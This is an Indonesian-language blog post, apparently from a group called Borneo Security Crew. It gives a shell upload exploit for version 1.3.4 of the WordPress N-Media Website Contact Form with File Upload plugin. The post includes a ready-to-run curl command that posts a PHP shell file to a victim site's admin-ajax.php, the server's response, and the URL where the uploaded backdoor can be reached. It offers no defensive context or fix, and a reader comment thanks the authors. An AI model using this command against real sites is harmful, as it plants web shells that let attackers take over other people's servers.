WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Monday, April 13, 2015

WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Bug :

The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.

######################

# PoC:

Terminal -> masukin command :

curl -k -X POST -F "action=upload" -F "Filedata=@nama-shell.php" -F "action=nm_webcontact_upload_file" http://korban/wp-admin/admin-ajax.php

Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}

######################

# Lokasi Shell :

http://korban/wp-content/uploads/contact_files/1427927588-backdoor.php

Contoh Vulnerable :

WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

4/ 5

Oleh Unknown

Unknown 5:45:00 PM 1 Komentar

1 komentar:

PURWOREJO CYBER TEAM

April 28, 2015 at 10:52 PM delete

Nice Share gan :D

Untuk kalian yang ingin dibuatkan tentang tutorial sama kami, bisa kirim saran atau komentar dibawah.
Jika kalian Ingin dihargai, Berkomentarlah yang Baik.

Borneo Security Crew

Monday, April 13, 2015